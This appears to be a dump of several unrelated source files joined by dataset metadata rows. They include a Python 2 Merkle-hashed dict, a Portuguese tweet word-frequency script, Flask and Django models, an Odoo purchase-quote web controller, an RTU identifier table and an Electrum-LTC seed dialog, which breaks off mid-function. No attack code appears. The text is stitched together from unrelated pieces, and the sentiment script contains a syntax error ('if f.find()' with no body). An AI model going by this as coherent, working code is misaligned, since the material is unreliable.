def __setitem__(self, key, value):
hash_value = self.__hash_item(key, value)
self.__key_to_hash[key] = hash_value
if key in self:
for tree in self.__trees.itervalues():
tree.delete(key, hash_value)
super(HashedDict, self).__setitem__(key, value)
for tree in self.__trees.itervalues():
tree.add(key, hash_value)
self.__manage_cached_trees()
def __delitem__(self, key):
self.__manage_cached_trees()
for tree in self.__trees.itervalues():
tree.delete(key, self.__key_to_hash[key])
del self.__key_to_hash[key]
super(HashedDict, self).__delitem__(key)
def update(self, *args, **kwargs):
if args:
if len(args) > 1:
raise TypeError("update expected at most 1 arguments, "
"got %d" % len(args))
other = dict(args[0])
for key in other:
self[key] = other[key]
for key in kwargs:
self[key] = kwargs[key]
def setdefault(self, key, value=None):
if key not in self:
self[key] = value
return self[key]
def __manage_cached_trees(self):
dict_length = len(self)
curr_depth = self.__get_depth_for_length(dict_length)
range_start = max(0, curr_depth - (self.__trees_cache_size/2))
range_end = range_start + self.__trees_cache_size
allowed_trees = set(xrange(range_start, range_end))
existing_trees = set(self.__trees.keys())
deprecated_keys = existing_trees - allowed_trees
new_keys = allowed_trees - existing_trees
for tree_key in deprecated_keys:
del self.__trees[tree_key]
for tree_key in new_keys:
new_tree = HashTree(self.__key_to_hash,
self.__hashalg, tree_key)
new_tree.start()
self.__trees[tree_key] = new_tree
@staticmethod
def __get_depth_for_length(length):
if length == 0:
return 0
else:
return int(ceil(log(length, 2)))
def __hash_item(self, key, value):
return (self.__hashalg(self.__hashalg(repr(key)).digest() +
self.__hashalg(repr(value)).digest()).digest())
class HashTree(threading.Thread):
def __init__(self, key_to_hash, hashalg, tree_depth):
threading.Thread.__init__(self)
self.__key_to_hash = key_to_hash.copy()
self.__tree_depth = tree_depth
self.__hashalg = hashalg
def run(self):
self.__tree = self.__build_tree()
self.__leaf_hashes = self.__build_leaf_items()
self.__rehash_all()
def get_hash(self):
self.join()
return self.__tree[0][0]
def add(self, key, hash_value):
self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
self.__leaf_hashes[position].append(hash_value)
self.__rehash(position)
def delete(self, key, hash_value):
self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
while hash_value in self.__leaf_hashes[position]:
self.__leaf_hashes[position].remove(hash_value)
self.__rehash(position)
def __build_tree(self):
tree = []
for i in xrange(self.__tree_depth+1):
current_row = [None for j in xrange(1 << i)]
tree.append(current_row)
return tree
def __build_leaf_items(self):
leaf_count = 1 << self.__tree_depth
new_leaf_items = [[] for i in xrange(leaf_count)]
for key, hash_value in self.__key_to_hash.iteritems():
position = (crc32(key) & 0xffffffff) % leaf_count
new_leaf_items[position].append(hash_value)
return new_leaf_items
def __rehash_all(self):
self.__tree[-1] = [self.__hash_leaf(leaf_items) for leaf_items in self.__leaf_hashes]
for row_nr in xrange(self.__tree_depth,0,-1):
row = self.__tree[row_nr]
for current_position in xrange(0, (len(row)+1)/2):
self.__rehash_parent(row_nr, current_position)
def __rehash(self, leaf_position):
leaf_items = self.__leaf_hashes[leaf_position]
self.__tree[-1][leaf_position] = self.__hash_leaf(leaf_items)
lchild_pos = leaf_position
for row_nr in xrange(self.__tree_depth, 0, -1):
#current_position = self.__rehash_parent(row_nr, current_position)
rchild_pos = lchild_pos | (1 << (row_nr - 1))
lchild_pos = lchild_pos & ((1 << (row_nr - 1)) - 1)
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
def __hash_leaf(self, leaf_items):
leaf_items.sort()
hashalg = self.__hashalg()
for item in leaf_items:
hashalg.update(item)
return hashalg.digest()
def __rehash_parent(self, row_nr, element_pos):
lchild_pos = element_pos & ((1 << (row_nr - 1)) - 1)
rchild_pos = element_pos | (1 << (row_nr - 1))
#parent_pos = lchild_pos
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
#lchild_hash = children_row[lchild_pos]
#rchild_hash = children_row[rchild_pos]
#parent_row[parent_pos] = self.__hashalg(lchild_hash + \
# rchild_hash).digest()
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
if __name__ == '__main__':
pangram = HashedDict(pangram="The quick brown fox jumps over the lazy dog")
assert pangram.get_hash() == '\xe9|\xdcJ=\xda\x84\xbd\xa6\x8e\xea\x9c=\x16\x93' + \
'x\xb2\xff9\x83S!\xfbE\xbc\x0c\x83\xb8`H\x94\xa6'
hd1 = HashedDict()
empty_hash = hd1.get_hash()
assert empty_hash == "\xe3\xb0\xc4B\x98\xfc\x1c\x14\x9a\xfb\xf4\xc8\x99" + \
"o\xb9$'\xaeA\xe4d\x9b\x93L\xa4\x95\x99\x1bxR\xb8U"
hd1["key1"] = "value1"
new_hash = hd1.get_hash()
del hd1["key1"]
assert empty_hash == hd1.get_hash()
hd2 = HashedDict(key1="value1", key2="value2")
del hd2["key2"]
assert hd2.get_hash() == new_hash
del hd2["key1"]
assert hd2.get_hash() == empty_hash
hd3 = HashedDict()
assert hd3.get_hash() == empty_hash
hashList = []
for i in xrange(1026):
hashList.append(hd3.get_hash())
hd3[str(i)] = i
for i in xrange(1025, -1, -1):
del hd3[str(i)]
assert hashList[i] == hd3.get_hash()
print "all tests successful"
| gpl-3.0 | 3,286,080,142,900,720,000 | 33.19661 | 95 | 0.54322 | false |
eriksonJAguiar/TCC-UENP-Codigos | My_codes/tools-sentiment/word_freq.py | 1 | 4759 | import nltk
import pandas as pd
import re
from googletrans import Translator
from unicodedata import normalize
def read_csv(file):
df1 = pd.DataFrame.from_csv('files_extern/%s.csv'%(file),sep=';',index_col=0,encoding ='ISO-8859-1')
df1 = df1.reset_index()
return df1
def write_csv(data,file):
df = pd.DataFrame(data)
df.to_csv('files_extern/'+file+'.csv', mode='w', sep=';',index=False, header=False,encoding='utf8')
def clear(dataframe):
new_df_tweet = []
new_df_sent = []
zipped = zip(dataframe['tweet'],dataframe['opiniao'])
for (df,opiniao) in zipped:
expr = re.sub(r"http\S+", "", df)
#expr = re.sub(r"[@#]\S+","",expr)
expr = normalize('NFKD',expr).encode('ASCII','ignore').decode('ASCII')
filtrado = [w for w in nltk.regexp_tokenize(expr.lower(),"[^0-9\W_]+") if not w in nltk.corpus.stopwords.words('portuguese')]
for f in filtrado:
if len(f) >= 2:
#print(f)
#print(opiniao)
new_df_tweet.append(f)
new_df_sent.append(opiniao)
new_df = pd.DataFrame()
new_df['tokens'] = new_df_tweet
new_df['sentimento'] = new_df_sent
return new_df
def convert_df(df):
new_df = []
for d in df:
if d == 'Positivo':
new_df.append(1)
elif d == 'Neutro':
new_df.append(0)
elif d == 'Negativo':
new_df.append(-1)
return new_df
def exlusivos(vet_neg,vet_neu,vet_pos):
ex_pos = []
ex_neg = []
ex_neu = []
tupla = zip(vet_neg,vet_neu,vet_pos)
for (neg,neu,pos) in tupla:
if not (neg in vet_pos or neg in vet_neu):
ex_neg.append(neg)
if not (neu in vet_neg or neu in vet_pos):
ex_neu.append(neu)
if not (pos in vet_neg or pos in vet_neu):
ex_pos.append(pos)
print(ex_neg)
print(ex_neu)
print(ex_pos)
return ex_neg, ex_neu, ex_pos
def bigram(frases,vet_neg, vet_neu,vet_pos):
bi_neg = []
bi_neu = []
bi_pos = []
for f in frases:
if f.find()
if __name__ == '__main__':
df_tweets = read_csv('dataset-portuguese')
df_tweets['opiniao'] = convert_df(df_tweets['opiniao'])
df_words = clear(df_tweets)
neg = df_words.loc[df_words['sentimento'] == -1]
neu = df_words.loc[df_words['sentimento'] == 0]
pos = df_words.loc[df_words['sentimento'] == 1]
neg_freq = nltk.FreqDist(neg['tokens'])
neu_freq = nltk.FreqDist(neu['tokens'])
pos_freq = nltk.FreqDist(pos['tokens'])
vet_neg = []
vet_neu = []
vet_pos = []
#neg_freq.plot(50, cumulative=False)
#neu_freq.plot(50, cumulative=False)
#pos_freq.plot(50, cumulative=False)
#print(neg_freq.most_common(30))
#print('------------------------')
#print(neu_freq.most_common(30))
#print('------------------------')
#print(pos_freq.most_common(30))
tupla = zip(neg_freq.most_common(len(neg)),neu_freq.most_common(len(neu)),pos_freq.most_common(len(pos)))
df_neg = pd.DataFrame()
df_neu = pd.DataFrame()
df_pos = pd.DataFrame()
words_neg = dict()
words_neu = dict()
words_pos = dict()
words_neg['pt'] = []
words_neg['en'] = []
words_neg['es'] = []
words_neu['pt'] = []
words_neu['en'] = []
words_neu['es'] = []
words_pos['pt'] = []
words_pos['en'] = []
words_pos['es'] = []
#neg_freq.plot(30, cumulative=False)
translator = Translator(service_urls=['translate.google.com','translate.google.com.br'])
for (ng,nu,ps) in tupla:
vet_neg.append(ng[0])
vet_neu.append(nu[0])
vet_pos.append(ps[0])
vet_neg, vet_neu,vet_pos = exlusivos(vet_neg,vet_neu,vet_pos)
tupla = zip(vet_neg[:50],vet_neu[:50],vet_pos[:50])
for (ng,nu,ps) in tupla:
words_neg['pt'].append(ng)
en=translator.translate(ng, dest='en').text
words_neg['en'].append(en)
words_neg['es'].append(translator.translate(en, dest='es').text)
words_neu['pt'].append(nu)
en=translator.translate(nu, dest='en').text
words_neu['en'].append(en)
words_neu['es'].append(translator.translate(en, dest='es').text)
words_pos['pt'].append(ps)
en=translator.translate(ps, dest='en').text
words_pos['en'].append(en)
words_pos['es'].append(translator.translate(en, dest='es').text)
df_neg['pt'] = words_neg['pt']
df_neg['en'] = words_neg['en']
df_neg['es'] = words_neg['es']
df_neu['pt'] = words_neu['pt']
df_neu['en'] = words_neu['en']
df_neu['es'] = words_neu['es']
df_pos['pt'] = words_pos['pt']
df_pos['en'] = words_pos['en']
df_pos['es'] = words_pos['es']
write_csv(df_neg,'bigram_neg')
write_csv(df_neu,'bigram_neu')
write_csv(df_pos,'bigram_pos')
| gpl-3.0 | -3,722,365,995,457,834,500 | 26.039773 | 133 | 0.566085 | false |
evereux/flask_template | application/models.py | 1 | 2773 | import datetime
from application import db
from config import admin_group_name
Base = db.Model
username_maxlength = 24
name_maxlength = 60
email_maxlength = 24
group_maxlength = 64
groups = db.Table('groups',
db.Column('user_id', db.Integer, db.ForeignKey('users.id')),
db.Column('group_id', db.Integer, db.ForeignKey('group.id'))
)
class User(Base):
# defines tablename as it will be create in SQL
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(username_maxlength), index=True, unique=True)
name = db.Column(db.String(name_maxlength))
password = db.Column(db.LargeBinary(60))
email = db.Column(db.String(email_maxlength), unique=True)
date_added = db.Column(db.DateTime)
date_modified = db.Column(db.DateTime, onupdate=datetime.datetime.now)
def __init__(self, username, name, email, password):
self.username = username
self.name = name
self.password = password
self.email = email
def __repr__(self):
return '<User {}>'.format(self.username)
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return True
@property
def is_anonymous(self):
return False
@property
def is_admin(self):
""" returns true if the user is a member of the 'admin' group"""
user = User.query.filter_by(id = self.id).first()
for g in user.groups:
if g.group_name == admin_group_name:
return True
def get_id(self):
return str(self.id)
class Group(Base):
id = db.Column(db.Integer, primary_key=True)
group_name = db.Column(db.String(group_maxlength))
users = db.relationship('User',
secondary=groups,
backref=db.backref('groups',
lazy='dynamic',
order_by=group_name
)
)
# this is for when a group has many groups
# ie everyone in group 'admin' can be a member of group 'all'
# parents = db.relationship('Group',
# secondary=group_to_group,
# primaryjoin=id==group_to_group.c.parent_id,
# secondaryjoin=id==group_to_group.c.child_id,
# backref="children",
# remote_side=[group_to_group.c.parent_id])
def __init__(self, group_name):
self.group_name = group_name
@property
def __repr__(self):
return self.group_name
| mit | 7,453,348,614,232,633,000 | 29.472527 | 80 | 0.547782 | false |
bringsvor/bc_website_purchase | controllers/main.py | 1 | 11590 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
import werkzeug
import datetime
import time
import logging
import base64
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class purchase_quote(http.Controller):
@http.route([
"/purchase/<int:order_id>",
"/purchase/<int:order_id>/<token>"
], type='http', auth="public", website=True)
def view(self, order_id, token=None, message=False, **post):
# use SUPERUSER_ID allow to access/view order for public user
# only if he knows the private token
user_obj = request.registry.get('res.users')
group_obj = request.registry.get('res.groups')
user = user_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, request.uid)
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, token and SUPERUSER_ID or request.uid, order_id)
now = time.strftime('%Y-%m-%d')
"""
if token:
if token != order.access_token:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier ')
self.__message_post(body, order_id, type='comment')
"""
# if token is None and ( request.uid==user.id and user.active==False ):
if ( request.uid==user.id and user.active==False ):
if request.env.ref('web.login', False):
values = request.params.copy() or {}
values["redirect"] = "/purchase/%i" % (order_id);
return request.render('web.login', values)
# Checks groups
broker = False
# import pdb;pdb.set_trace()
for group_id in user.groups_id:
group = group_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, group_id.id)
if group.name == 'Elmatica Broker':
broker = True
if not broker:
partner_id = user.partner_id.parent_id.id or user.partner_id.id
if partner_id and request.uid != SUPERUSER_ID:
if partner_id != order.partner_id.id:
return request.website.render('website.404')
else:
if request.uid != SUPERUSER_ID:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier')
self.__message_post(body, order_id, type='comment')
# If the supplier is viewing this, he has received it. If he has received it it must be sent
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'send_rfq', context=request.context)
days = 0
if order.validity_date:
days = (datetime.datetime.strptime(order.validity_date, '%Y-%m-%d') - datetime.datetime.now()).days + 1
values = {
'quotation': order,
'message': message and int(message) or False,
'option': bool(filter(lambda x: not x.line_id, order.options)),
'order_valid': (not order.validity_date) or (now <= order.validity_date),
'days_valid': max(days, 0)
}
return request.website.render('bc_website_purchase.po_quotation', values)
# @http.route(['/purchase/accept'], type='json', auth="public", website=True)
@http.route(['/purchase/<int:order_id>/<token>/accept'], type='http', auth="public", website=True)
def accept(self, order_id, token=None, signer=None, sign=None, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
attachments=sign and [('signature.png', sign.decode('base64'))] or []
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
message = _('RFQ signed by %s') % (signer,)
self.__message_post(message, order_id, type='comment', subtype='mt_comment', attachments=attachments)
return werkzeug.utils.redirect("/purchase/%s" % (order_id))
@http.route(['/purchase/<int:order_id>/<token>/decline'], type='http', auth="public", website=True)
def decline(self, order_id, token, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
request.registry.get('purchase.order').action_cancel(request.cr, SUPERUSER_ID, [order_id])
message = post.get('decline_message')
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment')
return werkzeug.utils.redirect("/purchase/%s/%s?message=2" % (order_id, token))
@http.route(['/purchase/<int:order_id>/<token>/post'], type='http', auth="public", website=True)
def post(self, order_id, token, **post):
# use SUPERUSER_ID allow to access/view order for public user
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
message = post.get('comment')
ufile = post.get('attachment')
attachment_ids = []
kwargs = {}
if token != order.access_token:
return request.website.render('website.404')
if ufile:
Model = request.session.model('ir.attachment')
try:
data_attach = {
'name': ufile.filename,
'datas': base64.encodestring(ufile.read()),
'datas_fname': ufile.filename,
'res_model': 'purchase.order',
'res_id': int(order_id)
}
attachment_id = Model.create( data_attach, request.context)
args = {
'filename': ufile.filename,
'id': attachment_id
}
#attachment_ids.append((0, 0, data_attach))
attachment_ids.append(attachment_id)
kwargs = { 'attachment_ids': attachment_ids }
except Exception:
args = {'error': "Something horrible happened"}
_logger.exception("Fail to upload attachment %s" % ufile.filename)
return werkzeug.utils.redirect("/purchase/%s/%s?message=0" % (order_id, token))
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment',**kwargs)
return werkzeug.utils.redirect("/purchase/%s/%s?message=1" % (order_id, token))
# def __message_post(self, message, order_id, type='comment', subtype=False, attachments=[]):
def __message_post(self, message, order_id, type='comment', subtype=False, **kwargs):
request.session.body = message
cr, uid, context = request.cr, request.uid, request.context
user = request.registry['res.users'].browse(cr, SUPERUSER_ID, uid, context=context)
if 'body' in request.session and request.session.body:
request.registry.get('purchase.order').message_post(cr, SUPERUSER_ID, order_id,
body=request.session.body,
type=type,
subtype=subtype,
author_id=user.partner_id.id,
context=context,
attachments=None,
parent_id=False,
subject=None,
content_subtype='html',
**kwargs
)
request.session.body = False
return True
@http.route(['/purchase/update_line'], type='json', auth="public", website=True)
# def update_line(self, update_data, **post):
def update_line(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent'):
return False
# import pdb;pdb.set_trace()
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
try:
leadtime = post['leadtime'][i]
except:
leadtime = 0
pass
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
'leadtime': leadtime,
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
return True
@http.route(['/purchase/save'], type='json', auth="public", website=True)
def save(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent','confirmed','approved'):
return False
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
#try:
# leadtime = post['leadtime'][i]
#except:
# leadtime = 0
# pass
if order.state in ('draft','sent'):
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
# 'leadtime': leadtime,
}
else:
vals = {
'date_code': post['date_code'][i],
'units_shipped': post['units_shipped'][i],
'weight': post['weight'][i],
'collies': post['collies'][i],
'units_in_stock': post['units_in_stock'][i],
'lot_week': post['lot_week'][i],
'lot_year': post['lot_year'][i],
'batch_number': post['batch_number'][i],
'tracking_number': post['tracking_number'][i],
'date_code': post['date_code'][i],
'expiry_date': post['expiry_date'][i],
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.write(request.cr,SUPERUSER_ID,[order_id],{'saved': True},context=request.context)
return True
@http.route(["/purchase/template/<model('purchase.quote.template'):quote>"], type='http', auth="user", website=True)
def template_view(self, quote, **post):
values = { 'template': quote }
return request.website.render('bc_website_purchase.po_template', values)
| agpl-3.0 | -1,163,517,802,710,959,900 | 41.925926 | 120 | 0.605091 | false |
xiefeimcu/mcu_code | Python/pyqt/rtuUI/rtuMsg.py | 1 | 3918 | __author__ = 'xiefei'
import sys
import time
import datetime
import binascii
stu = {
'IDT_TT': 'TT' ,
'IDT_ST' : 'ST' ,
'IDT_RGZS' : 'RGZS' ,
'IDT_PIC' : 'PIC' ,
'IDT_DRP' : 'DRP' ,
'IDT_DRZ1' : 'DRZ1' ,
'IDT_DRZ2' : 'DRZ2' ,
'IDT_DRZ3' : 'DRZ3' ,
'IDT_DRZ4' : 'DRZ4' ,
'IDT_DRZ5' : 'DRZ5' ,
'IDT_DRZ6' : 'DRZ6' ,
'IDT_DRZ7' : 'DRZ7' ,
'IDT_DRZ8' : 'DRZ8' ,
'IDT_DATA' : 'DATA' ,
'IDT_AC' : 'AC' ,
'IDT_AI' : 'AI' ,
'IDT_C' : 'C' ,
'IDT_DRxnn' : 'DRxnn' ,
'IDT_DT' : 'DT' ,
'IDT_ED' : 'ED' ,
'IDT_EJ' : 'EJ' ,
'IDT_FL' : 'FL' ,
'IDT_GH' : 'GH' ,
'IDT_GN' : 'GN' ,
'IDT_GS' : 'GS' ,
'IDT_GT' : 'GT' ,
'IDT_GTP' : 'GTP' ,
'IDT_H' : 'H' ,
'IDT_HW' : 'HW' ,
'IDT_M10' : 'M10' ,
'IDT_M20' : 'M20' ,
'IDT_M30' : 'M30' ,
'IDT_M40' : 'M40' ,
'IDT_M50' : 'M50' ,
'IDT_M60' : 'M60' ,
'IDT_M80' : 'M80' ,
'IDT_M100' : 'M100' ,
'IDT_MST' : 'MST' ,
'IDT_NS' : 'NS' ,
'IDT_P1' : 'P1' ,
'IDT_P2' : 'P2' ,
'IDT_P3' : 'P3' ,
'IDT_P6' : 'P6' ,
'IDT_P12' : 'P12' ,
'IDT_PD' : 'PD' ,
'IDT_PJ' : 'PJ' ,
'IDT_PN01' : 'PN01' ,
'IDT_PN05' : 'PN05' ,
'IDT_PN10' : 'PN10' ,
'IDT_PN30' : 'PN30' ,
'IDT_PR' : 'PR' ,
'IDT_PT' : 'PT' ,
'IDT_Q ' : 'Q' ,
'IDT_Q1' : 'Q1' ,
'IDT_Q2' : 'Q2' ,
'IDT_Q3' : 'Q3' ,
'IDT_Q4' : 'Q4' ,
'IDT_Q5' : 'Q5' ,
'IDT_Q6' : 'Q6' ,
'IDT_Q7' : 'Q7' ,
'IDT_Q8' : 'Q8' ,
'IDT_QA' : 'QA' ,
'IDT_QZ' : 'QZ' ,
'IDT_SW' : 'SW' ,
'IDT_UC' : 'UC' ,
'IDT_UE' : 'UE' ,
'IDT_US' : 'US' ,
'IDT_VA' : 'VA' ,
'IDT_VJ' : 'VJ' ,
'IDT_VT' : 'VT' ,
'IDT_Z' : 'Z' ,
'IDT_ZB' : 'ZB' ,
'IDT_ZU' : 'ZU' ,
'IDT_Z1' : 'Z1' ,
'IDT_Z2' : 'Z2' ,
'IDT_Z3' : 'Z3' ,
'IDT_Z4' : 'Z4' ,
'IDT_Z5' : 'Z5' ,
'IDT_Z6' : 'Z6' ,
'IDT_Z7' : 'Z7' ,
'IDT_Z8' : 'Z8' ,
'IDT_SQ' : 'SQ' ,
'IDT_ZT' : 'ZT' ,
'IDT_pH' : 'pH' ,
'IDT_DO' : 'DO' ,
'IDT_COND' : 'COND' ,
'IDT_TURB' : 'TURB' ,
'IDT_CODMN' : 'CODMN' ,
'IDT_REDOX' : 'REDOX' ,
'IDT_NH4N' : 'NH4N' ,
'IDT_TP' : 'TP' ,
'IDT_TN' : 'TN' ,
'IDT_TOC' : 'TOC' ,
'IDT_CU' : 'CU' ,
'IDT_ZN' : 'ZN' ,
'IDT_SE' : 'SE' ,
'IDT_AS' : 'AS' ,
'IDT_THG' : 'THG' ,
'IDT_CD' : 'CD' ,
'IDT_PB' : 'PB' ,
'IDT_CHLA' : 'CHLA' ,
'IDT_WP1' : 'WP1' ,
'IDT_WP2' : 'WP2' ,
'IDT_WP3' : 'WP3' ,
'IDT_WP4' : 'WP4' ,
'IDT_WP5' : 'WP5' ,
'IDT_WP6' : 'WP6' ,
'IDT_WP7' : 'WP7' ,
'IDT_WP8' : 'WP8' ,
'IDT_SYL1' : 'SYL1' ,
'IDT_SYL2' : 'SYL2' ,
'IDT_SYL3' : 'SYL3' ,
'IDT_SYL4' : 'SYL4' ,
'IDT_SYL5' : 'SYL5' ,
'IDT_SYL6' : 'SYL6' ,
'IDT_SYL7' : 'SYL7' ,
'IDT_SYL8' : 'SYL8' ,
'IDT_SBL1' : 'SBL1' ,
'IDT_SBL2' : 'SBL2' ,
'IDT_SBL3' : 'SBL3' ,
'IDT_SBL4' : 'SBL4' ,
'IDT_SBL5' : 'SBL5' ,
'IDT_SBL6' : 'SBL6' ,
'IDT_SBL7' : 'SBL7' ,
'IDT_SBL8' : 'SBL8' ,
'IDT_VTA' : 'VTA' ,
'IDT_VTB' : 'VTB' ,
'IDT_VTC' : 'VTC' ,
'IDT_VIA' : 'VIA' ,
'IDT_VIB' : 'VIB' ,
'IDT_VIC' : 'VIC' ,
}
class messag ():
def getSystimeS(self):
return time.strftime("%y%m%d%H%M%S")
def getSystime(self):
return time.strftime("%y%m%d%H%M")
def sendRtuArgTable(self, data, Len):
print(str(data))
print(stu.get('IDT_VIC'))
def initRtu(self):
self.sendRtuArgTable(self,'nihao' , 5)
| gpl-3.0 | -2,833,789,607,036,971,000 | 23.641509 | 46 | 0.351965 | false |
philanthropy-u/edx-platform | openedx/features/partners/admin.py | 1 | 1216 | from django.contrib import admin
from django.urls import reverse
from .models import Partner, PartnerCommunity, PartnerUser
class PartnerAdmin(admin.ModelAdmin):
"""
Django admin customizations for Partner model
"""
list_display = ('id', 'label', 'slug', 'partner_url')
readonly_fields = ('partner_url',)
def partner_url(self, obj):
if obj.slug:
return reverse('partner_url', kwargs={'slug': obj.slug})
class PartnerUserModelAdmin(admin.ModelAdmin):
"""
Django admin to verify if user is affiliated with partner or not after login or registration
"""
raw_id_fields = ('user',)
class PartnerCommunityModelAdmin(admin.ModelAdmin):
"""
Django admin model to add community id to partner so that every user is added automatically to that community
"""
list_display = ['id', 'partner', 'community_id']
search_fields = ('partner', 'community_id')
class Meta(object):
verbose_name = 'Partner Community'
verbose_name_plural = 'Partner Communities'
admin.site.register(Partner, PartnerAdmin)
admin.site.register(PartnerCommunity, PartnerCommunityModelAdmin)
admin.site.register(PartnerUser, PartnerUserModelAdmin)
| agpl-3.0 | 6,408,310,665,756,646,000 | 28.658537 | 113 | 0.702303 | false |
vialectrum/vialectrum | electrum_ltc/gui/qt/seed_dialog.py | 1 | 9848 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import (QVBoxLayout, QCheckBox, QHBoxLayout, QLineEdit,
QLabel, QCompleter, QDialog, QStyledItemDelegate)
from electrum_ltc.i18n import _
from electrum_ltc.mnemonic import Mnemonic, seed_type
from electrum_ltc import old_mnemonic
from .util import (Buttons, OkButton, WWLabel, ButtonsTextEdit, icon_path,
EnterButton, CloseButton, WindowModalDialog, ColorScheme)
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .completion_text_edit import CompletionTextEdit
def seed_warning_msg(seed):
return ''.join([
"<p>",
_("Please save these {0} words on paper (order is important). "),
_("This seed will allow you to recover your wallet in case "
"of computer failure."),
"</p>",
"<b>" + _("WARNING") + ":</b>",
"<ul>",
"<li>" + _("Never disclose your seed.") + "</li>",
"<li>" + _("Never type it on a website.") + "</li>",
"<li>" + _("Do not store it electronically.") + "</li>",
"</ul>"
]).format(len(seed.split()))
class SeedLayout(QVBoxLayout):
def seed_options(self):
dialog = QDialog()
vbox = QVBoxLayout(dialog)
if 'ext' in self.options:
cb_ext = QCheckBox(_('Extend this seed with custom words'))
cb_ext.setChecked(self.is_ext)
vbox.addWidget(cb_ext)
if 'bip39' in self.options:
def f(b):
self.is_seed = (lambda x: bool(x)) if b else self.saved_is_seed
self.is_bip39 = b
self.on_edit()
if b:
msg = ' '.join([
'<b>' + _('Warning') + ':</b> ',
_('BIP39 seeds can be imported in Electrum, so that users can access funds locked in other wallets.'),
_('However, we do not generate BIP39 seeds, because they do not meet our safety standard.'),
_('BIP39 seeds do not include a version number, which compromises compatibility with future software.'),
_('We do not guarantee that BIP39 imports will always be supported in Electrum.'),
])
else:
msg = ''
self.seed_warning.setText(msg)
cb_bip39 = QCheckBox(_('BIP39 seed'))
cb_bip39.toggled.connect(f)
cb_bip39.setChecked(self.is_bip39)
vbox.addWidget(cb_bip39)
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
self.is_ext = cb_ext.isChecked() if 'ext' in self.options else False
self.is_bip39 = cb_bip39.isChecked() if 'bip39' in self.options else False
def __init__(self, seed=None, title=None, icon=True, msg=None, options=None,
is_seed=None, passphrase=None, parent=None, for_seed_words=True):
QVBoxLayout.__init__(self)
self.parent = parent
self.options = options
if title:
self.addWidget(WWLabel(title))
